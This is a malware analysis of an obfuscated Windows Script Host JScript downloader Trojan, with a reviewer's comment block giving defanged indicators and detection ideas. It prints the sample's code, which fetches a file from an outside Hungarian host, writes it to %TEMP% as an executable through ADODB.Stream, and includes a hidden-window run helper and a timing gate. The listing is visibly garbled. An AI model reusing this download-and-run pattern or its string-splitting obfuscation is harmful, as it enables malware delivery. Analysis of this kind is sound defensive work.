Sample analysis and crawling show that this malicious program is a downloader Trojan.
If the term is unfamiliar, see the Baidu Encyclopedia entry:
Http://baike.baidu.com/link?url=0dNqFM8QIjEQhD71ofElH0wHGktIQ3sMxer47B4z_54LSHixZYLcNWDgisJAeMRN5yJKjMu3znZc_sMh43cuwK
// NOTE(review): defender-oriented reading of the annotated WSH/JScript sample below.
// The listing was damaged in extraction/translation (identifier case and spacing changed,
// statements and comments fused onto a few long lines), so it is an illustration of the
// technique and is not expected to parse or run as printed.
//
// Obfuscation: every method name, ProgID, URL and path is split into short string fragments
// held in randomly named variables and concatenated at the call site. The analyst's inline
// `//` notes give the reassembled values (close, savetofile, position, write, type, open,
// "ADODB.stream", createobject, msxml2.xmlhttp, wscript.shell / run, %temp%, and the
// environment-string expansion method).
// The leading groups of `var` assignments that spell "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf"
// are not referenced by any visible call and appear to be filler - TODO confirm on the raw sample.
//
// Timing gate: several getMilliseconds readings separated by WScript.Sleep are compared in the
// `if` that wraps the main body; the analyst marks them "10s". This looks like a delay /
// anti-sandbox check, but the Sleep arguments are missing from this listing - confirm on the raw sample.
//
// Behaviour as annotated by the analyst:
//   1. Create WScript.Shell and expand %TEMP% to build the drop path (annotated file name kysekom1po7.exe).
//   2. Create MSXML2.XMLHTTP and issue a synchronous GET (third argument false) to the annotated URL.
//   3. Poll readyState until it reaches 4, sleeping 1000 ms between checks.
//   4. Create ADODB.Stream, set Type = 1 (binary), write responseBody, reset Position to 0.
//   5. SaveToFile(path, 2) - option 2 overwrites an existing file - then Close.
//   6. A helper wraps WshShell.Run(cmd, 0, 0) (hidden window, no wait); its call appears only
//      inside a comment in this listing, so whether the dropped file is launched here is unclear.
//
// Indicators taken from the analyst's annotations (defanged):
//   hxxp://www[.]nevjegyportal[.]hu/ok6j6n4h4  (the path fragment right after "hu/" is the
//   literal "0" in the code but "o" in the annotation - verify against the original sample)
//   %TEMP%\kysekom1po7.exe
//
// Detection ideas: wscript.exe/cscript.exe making outbound HTTP requests; a script host writing
// a PE file under %TEMP%; one script instantiating MSXML2.XMLHTTP, ADODB.Stream and WScript.Shell
// together; long runs of 1-4 character string assignments feeding bracket-notation member calls.
var ukczjmztw = "F"; var Vljbzijbrdixir = "SD"; var mzhidfbvgtzwl = "Uhi"; var xrxesgiwq = "Ya"; var stgtoceaugs = "F"; var Mcc Q = "GSD"; var yvfrnfkc = "a7o"; var Zokyxgifsuosdin = "d8f"; var rysgoqrkj = "HgS"; var fajepxv = "7"; var LzK = "U"; var wnkgg Byjhbgayk = "DFA"; var rqjm = "S"; var tcbpcsvm = "O"; var Glyiongtmo = "a"; var Cmleb = "Fkj"; var gumapaymgfr = "; l"; var AWOs Zjal = "D"; var rrruwakbvmdht = "S"; var qcfk = "a"; asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf//---------------------------------var wxgm = "F"; var WME = "SD"; var wyl = "HI"; var dgxr = "Yau"; var ofbjpavgdudsr = "SDF"; var akaujbxv = "G"; var Ywynebktcar = "a7o"; var umknxpoxkvv = "8f"; var jruthqojc Xz = "D"; var vmrauxwtpkwlzbj = "HgS"; var hnakwb = "Au7"; var Kurwvoq = "F"; var oxjw = "D"; var Wsagyfatjpu = "AOS"; var UdT = "J"; var wgkyturmi = "K"; var fwsau = "; lf"; var ussmxvh = "D"; var Xruulsujwzczein = "as";//asd;lfkjaosdfau7hgsd8fa7ogsdfyau hisdf////---------------------------------var fvjysepitgsz = "F"; var mjlm = "SD"; var ohdtwuswyldnd = "Hi"; var Nfkohhanka = "Au"; var pajlp = "FY"; var xteqe = "D"; var Wolngrckpnji = "S"; var Ctd0 = "og"; var ngjpec = "A7"; va R JOHMRZHTBT = "F"; var rwrr = "D8"; var xhuyvlxntg = "GS"; var aofesd = "7h"; var iartkeg = "FAU"; var UICUSNVVRYPV = "OSD"; VA R SQXTHDCTAOOEFV = "Ja"; var ksxja = "K"; var azmzqadlr = "; lf"; var ofzc = "SD"; var UFs = "a";//ASD;LFKJAOSDFAU7HGSD8FA7OGSD fyauhisdf//-----------------------------------var WiM = "ose", var cdzfn = "L", var gtvoeyzrpmbky = "C";//close ();//----- ------------------------------var fkqycugsvdkek = "E"; var yldfonqslg = "Fil"; var kegv = "O"; var reweueffsfzcc = "VeT"; var Mcxydwkmdtez = "Sa";//savetofile ();//-----------------------------------var orfcagixftilpy = "on"; var AnB = "Iti"; var Oeudh = "POS";//position//-----------------------------------var bxwfuyaplk = "E"; var Zhbiendjhvi = "T"; var omwnrbis = "W Ri ";//write ()//-----------------------------------var ionaxhdnbsjshyl =" 
E "; var Svvps =" Typ ";//type//-------------- ---------------------var rxdykd = "Nvar ftsb = "Ope";//open//-----------------------------------var zzoo = "AM"; var tscsrkwikqy = "Tre"; var aifn = "B.s"; var Zbasfumik = "D"; var uwddgxvozcug = "O"; var musaovh = "D"; var Yzvowlzlpfausz = "A";//"ADODB.stream"//--------------------- --------------var pngkr = "ct", var iqpsquxjgp = "Je", var btjnufjw = "B"; var Liexl = "TeO"; var kzbj = "Rea"; var derqhnng = "C";//creatobject ("ADODB.stream") var litxpjamhxaguq = "4h4"; var wwzpwldmx = "6n"; var CuF0 = "k6j"; var ouhbkseqhf = "0"; VA R LQP = "hu/"; var rquoidonsf = "L."; var njkvurbzu = "Ta", var csyccmfj = "Por", var xctxpkvh = "Egy"; var auuclqfydbnsn = "J"; var Ltxzk = "ev"; var Mpaarovfxvesej = ". N"; var nvjesnhzihjx = "www"; var jfdhyk = "://"; var cfpmrsibsmp = "P"; var RKP = "Htt";//http://www.nevjegyportal.hu/ok 6j6n4h4//-----------------------------------var ubtufbihbmz = "T"; var lwkk = "GE";//Get//--------------------------- --------var krpxn = "Pen"; var Hrntkpoubmya = "O";//open//-----------------------------------var ofdmpjoyw = "E"; VAR nlpqqu = "x", var CZPODXEYVQRFB = "7.e", var clfbaiuobq = "PO", var xmxyenhbtwhg = "M1"; var dqzegam = "Ko"; var ckougmrgjte = "SE"; var qasyj = "Ky";//kysekom1po7.exe//-----------------------------------var eqycevqquazi = "%/"; var TNGKCALXXEPJMF = "P"; var mnyqbv = "M"; var Frwlczopjcmjvoe = "E"; var kynfxzksc = "%T";//%temp%///------------------------- ----------var ajbjrfwcho = "GS"; var ryw = "in"; var lvlachwja = "Str"; var Ngjuy = "T"; var zxmail = "n"; var Xlaapawdhgaz = " E "; var lrtf =" M "; var EGXWFANKP =" Ron "; var ucopd =" Vi "; var xzqvowinmg =" n "; var nlgbspqidlaij =" NdE "; var gyo =" Xpa "; VA R gpyeolnn = "E";//expendenvironmentstrings//-----------------------------------var kpsxpufdrzihigv = "TP"; var VGOFGZZDOVH = "T"; var Wjoaasugz = "LH"; var Bphwmdys = "XM"; var awpqzn = "2."; var rnvidtrapbbfho = "XML"; var Ynxoqhqdiqydxve = 
"MS";//msxml2.xmlhttp//-----------------------------------var Zkemzwunlwomdud = "n", var ovqabstejwqkg = "Ru", var WKRVEZGFPAMCAC = "ell"; var aojg = "H"; var hdveufs = "S";var Pgitzpyn = "."; var Itvqhxcrebdudt = "T", var wxgwfqyhw = "Rip", var KDSFP = "C"; var nzv = "WS";//wscript.shell.run ()//--------------------- --------------var nffhujlofwsus = "ct"; var kvzbovovglseg = "Je"; var DXP = "B"; var zjrmzjunjfuys = "O"; var ecdmpfvaxg = "E" var stma = "at"; var knalphmovixz = "Cre";//createobject ()//-----------------------------------var ACTC = new Date (); var SZT0 = Actc.getmilliseconds (); Wscript.Sleep, var actc = new Date (), var brdtypaqicd = Actc.getmilliseconds (); Wscript.Sleep, var actc = new Date (), var VrU = Actc.getmilliseconds (); Wscript.Sleep, var actc = new Date (), var deywdl = Actc.getmilliseconds ();//var Ndnaj = Brdtypaqicd-szt0;//var NdNAj=n EW date (). Getmilliseconds ()-new date (). Getmilliseconds ()////10svar hrormjj = vru-brdtypaqicd;//10svar YSc0 = DE ywdl-vru;//10sWshShell = wscript[knalphmovixz + stma + ecdmpfvaxg + zjrmzjunjfuys + DXP + kvzbovovglseg + NFFHUJLOFW SUs] (nzv + KDSFP + wxgwfqyhw + Itvqhxcrebdudt + Pgitzpyn + hdveufs + AOJG + WKRVEZGFPAMCAC);//wshshell=wscript[createobject] (Wscript.shell.run); function Jmljvnfwjsplh (NLN) {wshshell[ ovqabstejwqkg + Zkemzwunlwomdud] (nln, 0, 0);} function Jmljvnfwjsplh (NLN)//{//Wshshell[run] (nln,0,0);//}function OCEOSFHPWS (n) {return Ynxoqhqdiqydxve + Rnvidtrapbbfho + awpqzn + bphwmdys + Wjoaasugz + VGOFGZZDOVH + KPSXPUFDRZIHIGV;} function OCEOSFHPWS (n)//{//return msxml2.xmlhttp;//}if ((Ndnaj! = HRORMJJ) | | (HRORMJJ! 
= YSc0)) {FOIKDMMZWKAUGLW = Wshshell[gpyeolnn + gyo + nlgbspqidlaij + xzqvowinmg + ucopd + EGXWFANKP + lrtf + XLaaPawDhGaz + ZXMail + Ngjuy + lvlachwja + ryw + Ajbjrfwcho] (KYNFXZKSC + Frwlczopjcmjvoe + MNYQBV + TNGKCALXXEPJMF + Eqycevqquazi) + QasyJ + C Kougmrgjte + Dqzegam + xmxyenhbtwhg + clfbaiuobq + CZPODXEYVQRFB + nlpqqu + ofdmpjoyw;//foikdmmzwkauglw=/%temp%/Path//Wsh Shell[expendedenvironmentstrings] (%temp%); EFASPQJ = OCEOSFHPWS (0),//var xmlhttp=new activeobject ("Microsoft.XMLHTTP"); WMRQFSRLJDPWT = WScript.CreateObject ( EFASPQJ);////xmlhttp ObjeCt//[hrntkpoubmya + krpxn]==open Wmrqfsrljdpwt[hrntkpoubmya + KRPXN] (Lwkk + ubtufbihbmz, RKP + CFpmRSiBsMp + JFDhyk + NVJESNHZIHJX + Mpaarovfxvesej + ltxzk + auuclqfydbnsn + XCTXPKVH + csyccmfj + njkvurbzu + rquoidonsf + LQP + OUHbKSEqhF + CuF0 + wwzpwldmx + Litxpjamhxaguq, false);//WMRQFSRLJDPWT (get,http://www.nevjegyportal.hu/ok6j6n4h4,false);// Xmlhttp.open ("Get", "url", false); Wmrqfsrljdpwt.send (); while (Wmrqfsrljdpwt.readystate < 4) {Wscript.Sleep (1000) };//readystateelchu = wscript[knalphmovixz + stma + ecdmpfvaxg + zjrmzjunjfuys + DXP + kvzbovovglseg + NFFhujLOFwsUs] (YZVO Wlzlpfausz + MUSAOVH + uwddgxvozcug + zbasfumik + AIFN + tscsrkwikqy + zzoo);//var adostream=createobject ("ADODB.stream"); Elchu[hrntkpoubmya + KRPXN] ();//adostream.open (); Elchu[svvps + ionaxhdnbsjshyl] = 1;//adostream.type=1;elchu[ Omwnrbis + Zhbiendjhvi + bxwfuyaplk] (wmrqfsrljdpwt.responsebody);//adostream.write (wmrqfsrljdpwt.responsebody); Elchu[oeudh + AnB + orfcagixftilpy] = 0;//ADOSTREAM.POSITION=0;ELCHu[mcxydwkmdtez + reweueffsfzcc + KEGV + YLDFONQSLG + Fkqycugsvdkek] (FOIKDMMZWKAUGLW, 2);//adostream.savetofile (/%temp %/,2); Elchu[gtvoeyzrpmbky + CDZFN + WiM] ();//adostream.close ();//JMLJVNFWJSPLH ("/%temp%/");//wshshell[run] (NLN,0,0 ) Ndnaj = "ASD;LFKJAOSDFAU7HGSD8FA7OGSDFYAUHISDF" + new Date (). Getmilliseconds () + new Date (). 
Getmilliseconds (); /10SHRORMJJ = "ASD;LFKJAOSDFAU7HGSD8FA7OGSDFYAUHISDF" + VrU + brdtypaqicd;//new date (). Getmilliseconds ()-New date (). Getmilliseconds () = "ASD;LFKJAOSDFAU7HGSD8FA7OGSDFYAUHISDF" + new Date (). Getmilliseconds () + new Date (). Getmilliseconds ();//10sysc0 = "ASD;LFKJAOSDFAU7HGSD8FA7OGSDFYAUHISDF" + DEYWDL + vru;//10s}
Analysis of malicious Windows native script code (annotated)